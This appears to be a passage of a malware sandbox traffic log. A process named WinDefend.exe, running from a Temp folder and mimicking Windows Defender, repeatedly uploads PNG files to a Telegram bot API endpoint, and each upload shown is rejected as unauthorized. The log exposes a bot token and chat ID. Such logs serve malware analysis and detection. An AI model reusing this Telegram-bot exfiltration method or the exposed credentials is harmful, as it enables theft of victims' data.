2024-05-23 13:35:45 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="7ab0b122-2d0a-454c-9cd6-27f316b345b7" Host: api.telegram.org Content-Length: 2251 Expect: 100-continue
2024-05-23 13:35:45 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:45 UTC	40	OUT	Data Raw: 2d 2d 37 61 62 30 62 31 32 32 2d 32 64 30 61 2d 34 35 34 63 2d 39 63 64 36 2d 32 37 66 33 31 36 62 33 34 35 62 37 0d 0a Data Ascii: --7ab0b122-2d0a-454c-9cd6-27f316b345b7
2024-05-23 13:35:45 UTC	93	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 31 32 38 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 31 32 38 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=128.png; filename*=utf-8''128.png
2024-05-23 13:35:45 UTC	1933	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 06 00 00 00 c3 3e 61 cb 00 00 07 54 49 44 41 54 78 9c ed 9d cf 8b 26 47 1d 87 9f 6f 75 bf f3 ee cc 44 a3 2b 81 80 88 64 15 56 c1 5b 0e 82 08 21 87 d5 20 92 8b 64 f5 e2 51 fc 0b 8c a7 c8 5c 72 c8 e4 a6 98 45 bc 49 50 71 8f 46 64 10 15 6f 26 e0 49 50 c4 10 a2 68 14 06 93 d1 64 66 77 df e9 ae 8f 87 ee 9e 1f 38 8b 3b bb dd ef 5b 35 f5 7d 0e ef c0 ec f2 76 75 d5 53 9f aa b7 df aa 1a 70 1c c7 71 0a c5 96 75 21 81 f1 13 02 00 8f 2c ef ba 53 70 73 17 5d bf 4e bb ea 72 64 81 94 77 63 df 0d 2d b1 f3 4c 49 3d e5 9b 4b 98 19 02 d0 2b 5c 89 97 c2 53 11 3e 66 b2 47 31 e6 dd 7f c9 aa 22 63 bd 4e 38 f8 5b fb 6b fb 32 df 3d 79 7f b9 32 99 00 43 e5 1c ec f0 91 f9 bc 7a ae 6d f8 6a 55 71 29 cc 80 da Data Ascii: PNGIHDR>aTIDATx&GouD+dV[! dQ\rEIPqFdo&IPhdfw8;[5}vuSpqu!,Sps]Nrdwc-LI=K+\S>fG1"cN8[k2=y2CzmjUq)
2024-05-23 13:35:45 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 37 61 62 30 62 31 32 32 2d 32 64 30 61 2d 34 35 34 63 2d 39 63 64 36 2d 32 37 66 33 31 36 62 33 34 35 62 37 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --7ab0b122-2d0a-454c-9cd6-27f316b345b7Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:45 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:45 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 37 61 62 30 62 31 32 32 2d 32 64 30 61 2d 34 35 34 63 2d 39 63 64 36 2d 32 37 66 33 31 36 62 33 34 35 62 37 2d 2d 0d 0a Data Ascii: --7ab0b122-2d0a-454c-9cd6-27f316b345b7--
2024-05-23 13:35:45 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:45 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
212	192.168.2.5	61263	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:45 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="7f5e282c-36db-45f4-92a4-ce4ac209ceb7" Host: api.telegram.org Content-Length: 52104 Expect: 100-continue
2024-05-23 13:35:45 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:45 UTC	40	OUT	Data Raw: 2d 2d 37 66 35 65 32 38 32 63 2d 33 36 64 62 2d 34 35 66 34 2d 39 32 61 34 2d 63 65 34 61 63 32 30 39 63 65 62 37 0d 0a Data Ascii: --7f5e282c-36db-45f4-92a4-ce4ac209ceb7
2024-05-23 13:35:45 UTC	145	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 61 69 63 5f 66 69 6c 65 5f 69 63 6f 6e 73 5f 68 69 43 6f 6e 74 72 61 73 74 5f 77 6f 62 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 61 69 63 5f 66 69 6c 65 5f 69 63 6f 6e 73 5f 68 69 43 6f 6e 74 72 61 73 74 5f 77 6f 62 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=aic_file_icons_hiContrast_wob.png; filename*=utf-8''aic_file_icons_hiContrast_wob.png
2024-05-23 13:35:45 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 0e bc 00 00 00 80 08 06 00 00 00 e3 87 28 7b 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 40 00 49 44 41 54 78 01 ec 9d 07 b8 25 45 d1 f7 5d 32 f8 22 a0 28 49 01 13 06 04 0c 18 5e 03 bb a2 a0 22 60 e0 35 7c 46 14 11 33 46 54 50 f7 82 a8 18 41 31 20 8a 60 c0 88 82 8a 8a 92 16 13 a2 a2 a8 24 41 64 51 64 51 24 48 90 cc 7e bf ff b9 53 67 fb f6 9d 99 33 73 d2 f4 9c 53 f5 3c 75 3a 55 77 57 fd bb 6b 66 4e cf f4 cc 82 3b 95 d0 f2 e5 cb ef 4a f1 33 e1 dd e0 fb c2 f7 84 ef 0c a7 4c 37 a3 dc 25 f0 79 f0 49 f0 31 0b 16 2c b8 9c d0 69 00 04 98 0b eb 50 fd 03 f0 b3 e1 0d 2a 36 25 dc 3f 02 fe 1f ad 28 3f 34 31 f4 5d 9d c6 5e 01 bf 19 be cf d0 1a 9e db d0 45 24 65 db 51 d8 78 e3 dc 22 4f 8d 0a 81 96 1e 97 46 01 c7 ed Data Ascii: PNGIHDR({sRGB@IDATx%E]2"(I^"`5\|F3FTPA1 `$AdQdQ$H~Sg3sS<u:UwWkfN;J3L7%yI1,iP*6%?(?41]^E$eQx"OF
2024-05-23 13:35:45 UTC	4096	OUT	Data Raw: 8c 90 ac 28 ac 9f 72 1c 55 17 4b 5f c8 fd 3d e5 81 6a 58 37 e6 47 b2 fe 5e 04 0d 3a 3f 0d 7e 19 bc 4f 91 4c 5e 3e f2 95 fd 57 b2 a2 bc 76 52 cc 43 d5 c5 d2 17 72 7f 4f 71 80 12 d1 89 f9 91 a4 bf a3 d7 50 37 bc 0a 6e 39 43 55 d8 25 2b aa 2a df b4 1c aa 2e 96 be d0 a4 fb bb af d7 0d 30 d9 98 1f 6d 59 af fb 45 9e 99 e8 bf 2c 2f 3f 2f 4f ce 90 97 9f 97 27 59 51 5e 59 8a 79 a8 3a 2d eb 75 ee ef 03 4c 40 e6 49 5b fc dd d7 e7 4b c6 d9 fd bd 04 1c 2f ea 22 c0 3c 99 81 63 4a f6 fe 3b 8a da 17 5e 97 10 17 4b ff 9e 1b 5e 65 30 72 95 cf d7 92 15 75 81 4a 3c 82 aa 8b a5 2f e4 d7 f3 89 8f 55 93 ea 31 3f e4 2f 31 25 e9 ef 28 b9 5d a6 a8 fe db 7f 3a c4 8d b4 9e 13 fc 16 bc 5a 98 1f c6 29 ab ec bf 92 15 85 f5 53 8e a3 ea 62 e9 0b b9 bf a7 3c 50 0d eb c6 fc 68 85 bf a3 e7 Data Ascii: (rUK_=jX7G^:?~OL^>WvRCrOqP7n9CU%+*.0mYE,/?/O'YQ^Yy:-uL@I[K/"<cJ;^K^e0ruJ</U1?/1%(]:Z)Sb<Ph
2024-05-23 13:35:45 UTC	4096	OUT	Data Raw: 41 b9 83 d4 23 93 fa ee ef 3d 30 f2 e2 59 04 98 2b 49 f8 3b 7a dc 03 d6 b9 fd a7 f0 fe b0 e8 f5 d2 92 d0 ee 21 2c cc d2 63 df f0 8a 0e eb c2 27 c3 e6 db 47 cc 22 38 ff 17 19 7d fc e2 5b 81 ec c1 f3 a5 e6 e7 20 af e7 0a ac 7d 85 5b ce 97 9a 9f 83 9c fb fb 7c 58 3c 27 07 01 e6 4a 12 fe 2e d5 d0 e5 87 b0 68 95 1c 55 55 ae 17 4f bf 0f be 03 d6 87 2f ee 59 20 37 f2 ff ef f4 fd 4c 38 f4 4d c5 4f 85 bf 0a bf 17 7e 31 7c af 3c fd 86 9d 47 3f 2b fc 9d 84 53 31 02 7f a4 68 47 78 e5 61 0f 42 db da 13 44 4d e9 5c a7 6f c9 8a 9a d2 b5 a9 7e 67 ad 9e 1c bb cd 1e 0b 9b c2 35 f5 7e 0d 1f 0b ab e8 8b 6c d1 a6 d7 1d aa d4 af 23 23 bd ea c8 f7 23 5b a7 0f c9 8a fa e9 27 a5 3a b3 56 b4 df 0e c3 d4 ec b1 d0 f2 3d 1c 1c 01 30 1d db 45 bb c6 2f d6 98 2c 5d 88 df a2 b2 80 6e cf Data Ascii: A#=0Y+I;z!,c'G"8}[ }[\|X<'J.hUUO/Y 7L8MO~1\|<G?+S1hGxaBDM\o~g5~l###[':V=0E/,]n
2024-05-23 13:35:45 UTC	4096	OUT	Data Raw: d3 87 64 45 2b 6a 0f 1e a3 b9 95 e1 1f ab 5d e8 1a f8 41 d6 6a 27 87 1f 4b 0f 2b 1c 55 bb c3 d2 af 6e 3b 66 8f 85 75 eb bb 7c 3d 04 c0 d9 fd bd 07 64 60 f4 51 9b 8f 43 0c 8f ec d1 6d 6e b1 f5 9f 5b d8 c2 4c b3 c7 c2 16 9a d0 2a 95 c1 b9 e8 cb 50 7e 3d 1f 8c 24 38 ed 95 cd c9 99 20 7b ec d1 49 f3 0b b3 c7 c2 b1 03 3a 65 1d 82 b3 fb 7b 36 e6 60 61 3e 5d fa 95 b7 41 a7 08 fd 6c 9b cd ef 6e 3f a4 97 65 79 fe 85 d7 41 01 f6 fa 85 08 30 c7 dc df 0b d1 a9 5e 00 8e c7 66 fe ba 5f f5 5a f5 25 b3 3e 86 be 2e 50 5f 93 e1 d4 30 7b 2c 1c 4e ab de 4a 11 02 e0 ec fe 9e 81 d3 6b ce 65 e5 dd 73 72 1e a6 c8 f8 17 5e f3 80 29 c8 33 cc 2d 2c 10 f3 ec 21 21 00 ce be 5e 57 11 cb 5e 73 32 2b ef be 74 8e f4 d5 ca 2b 6a 3e 93 af b5 e1 35 ab 53 d8 66 51 5f a9 e6 9b 3d 16 a6 aa e7 Data Ascii: dE+j]Aj'K+Un;fu\|=d`QCmn[L*P~=$8 {I:e{6`a>]Aln?eyA0^f_Z%>.P_0{,NJkesr^)3-,!!^W^s2+t+j>5SfQ_=
2024-05-23 13:35:45 UTC	4096	OUT	Data Raw: 74 bc 0b ac ff f6 7a 68 e0 6a 82 33 18 fb 3d 95 76 72 04 52 47 80 39 eb e7 f7 d4 07 c9 f5 73 04 86 84 00 fe ae 87 e4 7d 7d 7e 16 cf ba cf ae f4 da f0 1a b7 d7 4b 83 3e aa df 00 00 40 00 49 44 41 54 7e 48 a3 ea cd 38 02 f9 08 b8 bf cf c1 65 18 eb f3 e1 43 81 73 1a f7 44 da 08 f0 bf 6c 28 cf b4 d0 4e 1e 9d 93 82 f5 05 fe fe 2a 14 1e da f3 36 b4 a5 17 ba bd 03 3e 93 f8 23 22 bb 3f 88 0e ef 8e f2 3c e9 08 38 02 23 40 60 1c fe 1e a8 bd 03 f1 2f c0 5a ef da 39 c8 4f 2a ca 31 e9 41 28 14 de f3 78 0a 79 33 c6 94 dd 2d 50 58 65 ab 05 69 8f 3a 02 c9 22 30 46 7f 3f 06 10 9e 10 00 a1 2f a6 bd 02 3e 2e cb 5b 03 bf 79 3e f1 1f 67 e9 54 83 f0 0b 70 7f 07 bf 8b 53 55 d4 f5 72 04 62 04 c6 e5 ef f8 b2 5e fc 70 1a bc 31 71 dd bb 5c 89 50 2f 74 fd 7f f0 09 70 2a a4 fb 82 f1 Data Ascii: tzhj3=vrRG9s}}~K>@IDAT~H8eCsDl(N6>#"?<8#@`/Z9O1A(xy3-PXei:"0F?/>.[y>gTpSUrb^p1q\P/tp*
2024-05-23 13:35:45 UTC	4096	OUT	Data Raw: ff 8b 39 cd 75 b3 68 b7 d7 57 5e 8f e9 0a 57 88 d0 9e be b4 5e f6 75 57 bd 00 72 a8 44 7f 63 fd c2 ab 94 a7 cf 39 54 c7 20 2a b6 d6 df d1 fd 95 73 0c e7 99 e8 d0 76 ca 7e 11 94 df 4e fc 01 56 4e fc 7b 41 99 a2 e1 c6 59 61 ea 5f 78 cd c0 8a 70 1a 9a bf db 58 e4 85 f4 a9 e3 f1 30 e9 5f 34 f6 a4 bc be da 96 17 83 52 47 7f ea b6 d6 df cd 4e 6c 88 af c3 57 b7 b2 5e 21 75 f5 52 d9 79 44 fe e7 60 a3 5a f7 49 ad d2 48 6f 1c cd d3 d8 33 1c 01 47 c0 11 70 04 a6 06 01 de ce f0 1f 8c 7d 75 c6 53 63 b7 1b 3a dd 08 70 81 a5 2f 32 9d 08 af 31 6d 48 e0 f3 7a 13 53 5b df c6 74 5d c5 f1 ea 3e 50 53 20 ff b7 82 fc 30 7b 2c 7f 4c c3 0e 3d 5e 8c 00 3e bb 19 a5 7a 83 60 77 d1 a5 58 7a a0 12 fd a1 fb 0e fd e9 2b 43 af c4 5f ae 18 a8 b5 86 2b b7 dc df 43 f4 3e 40 e2 15 70 d1 9b Data Ascii: 9uhW^W^uWrDc9T *sv~NVN{AYa_xpX0_4RGNlW^!uRyD`ZIHo3Gp}uSc:p/21mHzS[t]>PS 0{,L=^>z`wXz+C_+C>@p
2024-05-23 13:35:45 UTC	4096	OUT	Data Raw: 11 70 04 1c 81 69 45 60 83 c8 f0 33 b9 f6 d2 4d b3 56 12 ff 1b f6 42 f1 f0 65 38 b1 7d ad b4 2b 25 a5 99 1f cf 05 e7 07 a3 d3 3d 46 a8 97 be fe a5 b9 f8 df 11 f6 e1 4d 8f 1e 81 e3 e9 e2 59 cc 97 6f 12 3e 3a e8 4e 0f d8 39 39 02 8e 80 23 e0 08 38 02 8e 80 23 d0 2f 02 2b f5 5b d1 eb 39 02 53 86 80 af cf 4f d9 80 bb b9 8e 40 0f 04 6a 6f 76 ed d1 9e 17 3b 02 8e 40 5a 08 ec 54 a0 ce 2f b2 7c ad c7 bd 35 47 e6 89 ac dd ad 55 77 1d 96 3a 7a 91 e6 9d 73 da 53 d6 cf 68 4f eb bb 4e 8e 80 23 d0 02 04 f0 67 bd 0c 7b 37 78 0b f8 6e b0 d2 eb c0 7a e9 c5 03 60 27 47 c0 11 18 2e 02 07 d1 9c 5e 20 b6 46 4e b3 7a 3e f6 4d f0 3b a3 b2 7d a2 74 98 dc 37 4c f4 1b e7 58 b0 1e 75 9f 09 eb 1e b0 8e 03 76 2c d0 3a dc fd 61 27 47 c0 11 48 03 81 af a3 46 d1 86 d7 ad ab a8 88 bf 3f Data Ascii: piE`3MVBe8}+%=FMYo>:N99#8#/+[9SO@jov;@ZT/\|5GUw:zsShON#g{7xnz`'G.^ FNz>M;}t7LXuv,:a'GHF?
2024-05-23 13:35:45 UTC	4096	OUT	Data Raw: 70 1d 1c 81 16 21 b0 28 d3 f5 b9 84 cf e1 fc fc 7d 42 2d a4 fa e6 b6 0c 18 0f 1c 81 29 41 60 cf c0 ce e5 c4 b5 c9 f5 76 8e 09 7a db e8 97 74 ed 4e ba 73 43 26 90 f3 68 3b 11 d8 2a 53 bb e8 21 8b 9f 64 e5 8f 23 b4 0d af 77 63 0e 2c ca f2 af 63 2e 9c 99 c5 3d 18 3e 02 df 07 df bd aa 34 cb 98 cc 20 b7 38 90 fd 33 75 17 05 e9 c2 28 75 77 a1 f0 7b a1 40 d5 ba 61 9d 61 c4 d1 e5 70 da 09 8f 41 c3 68 d6 db 70 04 1c 81 fe 11 08 5f 70 a9 6b 02 27 47 c0 11 18 2d 02 be 3e 3f 5a 7c bd 75 47 a0 cd 08 fc 09 e5 ed ff db b0 ed 50 db 4e 89 23 c0 7f 25 3d 8b f1 65 58 0f c9 1e 54 51 dd 87 66 72 ff aa 28 ef 62 e3 45 e0 e9 05 dd 5d c1 7f f2 3f e6 95 91 7f 07 73 41 2f a8 d2 e6 d6 98 9e 4c d9 1a c8 f8 83 ef 31 32 ed 4e 6b 93 eb 57 60 ad cb ed cd 18 df 9d 31 be a2 dd 26 b9 f6 15 Data Ascii: p!(}B-)A`vztNsC&h;*S!d#wc,c.=>4 83u(uw{@aapAhp_pk'G->?Z\|uGPN#%=eXTQfr(bE]?sA/L12NkW`1&
2024-05-23 13:35:46 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:46 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
213	192.168.2.5	61264	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:46 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="64f452c2-59cc-48cb-9907-2fbcdbdb6917" Host: api.telegram.org Content-Length: 30376 Expect: 100-continue
2024-05-23 13:35:46 UTC	40	OUT	Data Raw: 2d 2d 36 34 66 34 35 32 63 32 2d 35 39 63 63 2d 34 38 63 62 2d 39 39 30 37 2d 32 66 62 63 64 62 64 62 36 39 31 37 0d 0a Data Ascii: --64f452c2-59cc-48cb-9907-2fbcdbdb6917
2024-05-23 13:35:46 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 39 32 62 66 62 36 38 61 64 62 35 34 61 36 65 63 39 35 30 31 39 36 62 34 64 33 39 63 63 66 33 65 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 39 32 62 66 62 36 38 61 64 62 35 34 61 36 65 63 39 35 30 31 39 36 62 34 64 33 39 63 63 66 33 65 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=92bfb68adb54a6ec950196b4d39ccf3e.png; filename*=utf-8''92bfb68adb54a6ec950196b4d39ccf3e.png
2024-05-23 13:35:46 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 ce 00 00 02 8c 08 02 00 00 00 5d 25 bc 9f 00 00 74 f7 49 44 41 54 78 da ec dd 7f 90 5d 57 61 27 f8 d6 cc e2 51 9b d8 f3 03 51 03 2c f9 a1 36 71 d7 16 f9 63 97 1f 81 84 ce a0 d4 ac 1d 67 36 19 92 a1 33 22 9b 1d 6f 4d 55 98 71 67 4b c4 9b f1 14 31 86 96 e5 38 44 fc 48 5a cf 63 4d 60 6c 86 44 b8 c1 31 05 49 8c 4c 1e 24 4b c6 26 15 d9 6d 58 d6 eb 2a d6 3f 5a 81 d8 95 40 dc e6 d9 96 2c c9 b6 9e d4 7b 5b 2d b5 5a fd ee 7d f7 c7 3b e7 bd fb fa 7d 3e f5 ca 65 3d 75 3f dd 7b ee 3d e7 9e f3 7d e7 9e 3b b6 ff 3f fd 27 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f af 20 af 31 45 e0 e5 e5 e5 e5 e5 e5 e5 e5 e5 e5 e5 e5 e5 e5 e5 15 38 6a 59 06 00 00 00 a0 07 a2 16 00 00 00 80 60 44 2d 00 00 00 00 c1 88 5a 00 00 Data Ascii: PNGIHDR]%tIDATx]Wa'QQ,6qcg63"oMUqgK18DHZcM`lD1IL$K&mX*?Z@,{[-Z};}>e=u?{=};?'//////////////// 1E8jY`D-Z
2024-05-23 13:35:46 UTC	4096	OUT	Data Raw: 53 91 e1 71 66 d4 52 6c 4e c1 99 67 bb ee 5f b7 b2 ef ca 63 62 b2 9f 78 5d fa 9e 82 80 7b 5a 60 28 18 e6 28 f7 ed 3b fc 3e 45 2d 6f bd fa df ef 08 78 17 cf da 00 be ab a5 bb a6 b7 16 39 f7 52 9e 2b 7c fa e4 5f fd c9 87 6f 2a f0 9c ac bc 93 70 58 a3 96 91 ae 14 00 a2 16 51 0b 00 c3 13 b5 b4 9a 33 45 1f be 33 f9 b3 bf fe 91 0d c3 bf f6 63 cd 8f fc e6 7f 2c f8 08 95 22 63 92 dc e1 f1 a5 d7 7c f6 2f 6e 78 e3 fa 65 32 de f4 ee 0f de fc c9 07 2e 18 58 b6 1e fc bd 3d bb 3b 47 aa 67 14 99 53 b0 ed 47 67 3e 9f f9 78 91 bc 25 54 0b 0e bd 72 f7 f4 1f 5f f3 f1 4f ae fb ca 3d 19 7e ff 9f bf b3 f6 58 df f6 33 f7 1f f8 c0 cf fd 60 a1 62 df f2 86 df 38 f4 97 17 a6 4b 93 3f f3 eb bf 7b 3e 45 6a 3d f8 a9 bd ff 7b c1 db a9 fe c1 3b 3f dd 87 d3 b4 4f 51 4b c7 48 fe b5 3f 7f Data Ascii: SqfRlNg_cbx]{Z`((;>E-ox9R+\|_o*pXQ3E3c,"c\|/nxe2.X=;GgSGg>x%Tr_O=~X3`b8K?{>Ej={;?OQKH?
2024-05-23 13:35:46 UTC	4096	OUT	Data Raw: 00 00 20 18 51 0b 00 00 00 40 30 a2 16 00 00 00 80 60 44 2d 00 00 00 00 c1 88 5a 00 00 00 00 82 11 b5 00 00 00 00 04 23 6a 01 00 00 00 08 46 d4 02 00 00 00 10 8c a8 05 00 00 00 20 18 51 0b 00 00 00 40 30 a2 16 00 00 00 80 60 44 2d 00 00 00 00 c1 88 5a 00 00 00 00 82 11 b5 00 00 00 00 04 23 6a 01 00 00 00 08 46 d4 02 00 00 00 10 8c a8 05 00 00 00 20 18 51 0b 00 00 00 40 30 a2 16 00 00 00 80 60 44 2d 00 00 00 00 c1 88 5a 00 00 00 00 82 11 b5 00 00 00 00 04 23 6a 01 00 00 00 08 46 d4 02 00 00 00 10 8c a8 05 00 00 00 20 18 51 0b 00 00 00 40 30 a2 16 00 00 00 80 60 44 2d 00 00 00 00 c1 88 5a 00 00 00 00 82 11 b5 00 00 00 00 04 23 6a 01 00 00 00 08 46 d4 02 00 00 00 10 8c a8 05 00 00 00 20 18 51 0b 00 00 00 40 30 a2 16 00 00 00 80 60 44 2d 00 00 00 00 c1 88 5a Data Ascii: Q@0`D-Z#jF Q@0`D-Z#jF Q@0`D-Z#jF Q@0`D-Z#jF Q@0`D-Z
2024-05-23 13:35:46 UTC	4096	OUT	Data Raw: 11 b5 84 eb b8 96 fa fc be 55 ff 20 27 4b 3f 06 08 85 5a ce 12 19 5c 88 88 b6 5e 06 98 48 88 5a ea 19 b5 f4 54 e7 0b 4e 3f ab 45 d4 d2 71 59 1d dd a8 a5 c0 06 14 ee e6 a6 3f 60 22 a7 e3 b4 7d 7a f6 8e 85 96 a8 a5 e7 7a 5a e0 03 7b 1a 4c 0e a8 1d a8 79 a3 54 56 8c 3a 52 c3 a8 e5 f8 e1 e6 cd d3 db c7 2b 36 cf 23 12 b5 a4 6c cc 26 8e 5a fa 51 91 fb 10 b5 44 a8 c2 91 ce a8 4d 1a b5 04 a8 35 9b 2c 6a 09 de d8 c6 ee 60 84 88 5a c2 75 5c 4b 1e ac 3e 55 ff cd 15 b5 04 3e a3 44 2d b5 88 5a dc 40 54 9f ce 50 e7 05 af 1e 51 cb c6 7f 50 d4 12 e4 1b c5 e5 e5 a5 43 b3 3b aa 5c f3 27 76 de 92 3e e5 52 d4 b2 19 a2 96 1e da 81 9a 37 4a 15 04 af 23 35 8b 5a da 8f cc bf 6b b2 a7 d6 79 54 a2 96 ce cd af 41 d4 12 eb f6 f8 7e 54 e4 be 44 2d c1 ab 70 9c 33 2a ee 32 07 03 8c 5a Data Ascii: U 'K?Z\^HZTN?EqY?`"}zzZ{LyTV:R+6#l&ZQDM5,j`Zu\K>U>D-Z@TPQPC;\'v>R7J#5ZkyTA~TD-p3*2Z
2024-05-23 13:35:46 UTC	4096	OUT	Data Raw: 00 00 10 8c a8 05 00 00 00 20 18 51 0b 00 00 00 40 30 a2 16 00 00 00 80 60 44 2d 00 00 00 00 c1 88 5a 02 7b b1 79 cd a5 5b c6 36 ba 74 a6 f9 62 f5 9f 04 0a 6a 2f 36 f7 37 f6 ce 4c 6d bb b0 5e 8d 6f 9f be e1 d6 e6 e2 29 05 d4 5b ab a5 e1 da bc 5a cd 99 89 b1 4e 53 8d c3 cb a7 9d 03 00 00 f5 c9 22 44 2d a2 16 e8 a3 f6 e2 17 76 4d 8d 8f 65 52 b7 7a 6f b5 34 5c 9b 97 a8 05 00 60 38 b2 08 51 cb 66 8d 5a 5e 5c 6c 5c 91 31 98 dd b6 a3 f1 70 89 89 03 8f 37 a6 74 d7 09 e3 bb cd 99 1f 19 eb ca a9 d5 7b ab 65 98 bd 79 89 5a 00 00 86 23 8b 10 b5 44 89 5a 2e fc ad 89 99 66 ab ff e3 b2 ec a8 65 6c cb f8 55 fb 1e 3d 5e f4 93 44 2d 04 72 6a 61 76 72 6c 4c d4 12 bb d5 32 cc de bc 44 2d 00 00 c3 91 45 88 5a 62 44 2d cf 2f cc be 69 dd 4f d7 2e 6a 19 1b 1b 9f 98 b9 a7 e8 36 Data Ascii: Q@0`D-Z{y[6tbj/67Lm^o)[ZNS"D-vMeRzo4\`8QfZ^\l\1p7t{eyZ#DZ.felU=^D-rjavrlL2D-EZbD-/iO.j6
2024-05-23 13:35:46 UTC	4096	OUT	Data Raw: 5a 0e 17 4f 31 f2 96 47 89 5c 86 ed 67 16 1a d3 d5 e6 b6 4c ec bc 65 21 ec f5 72 69 a1 b1 73 a2 dc 46 8c 4f 4c 37 16 8a 4c ab 29 3a 01 6a 75 85 b2 8c 15 5e 82 35 98 51 f6 54 d4 02 00 88 5a ea bd 7b ed c5 66 e3 9a 02 83 84 f1 ed 2b 37 97 2f 05 e9 f9 55 e9 23 e6 7e 37 38 0c 51 4b f7 c9 ed 39 05 b0 78 70 cf f4 64 d7 03 74 f3 f9 35 17 52 67 22 0c 34 6a 39 3b e4 c8 5a 47 a3 e4 c9 56 46 ee f0 72 fd a2 3f ab e3 b4 f4 f5 29 bb a6 00 03 d9 b5 0a 51 4b f4 02 89 74 a2 46 2a ed de a3 96 b5 9f cd cb 80 0a c7 04 b1 cb b0 b5 52 78 c5 47 fe 2b 4b 9c ec 6f 86 49 06 53 af 3f 33 85 42 aa 0b 57 e4 29 a0 b5 70 a0 fb 27 6f 9d da 75 f0 ec 07 a6 4f 9c 4c 5b 00 b8 f2 c5 25 f8 9e 8a 5a 00 00 51 cb 50 ec 5e 32 74 d9 df 48 59 07 71 f5 e9 ce b7 35 f3 be 89 ed 8b e3 8f 37 6f eb 58 a6 Data Ascii: ZO1G\gLe!risFOL7L):ju^5QTZ{f+7/U#~78QK9xpdt5Rg"4j9;ZGVFr?)QKtF*RxG+KoIS?3BW)p'ouOL[%ZQP^2tHYq57oX
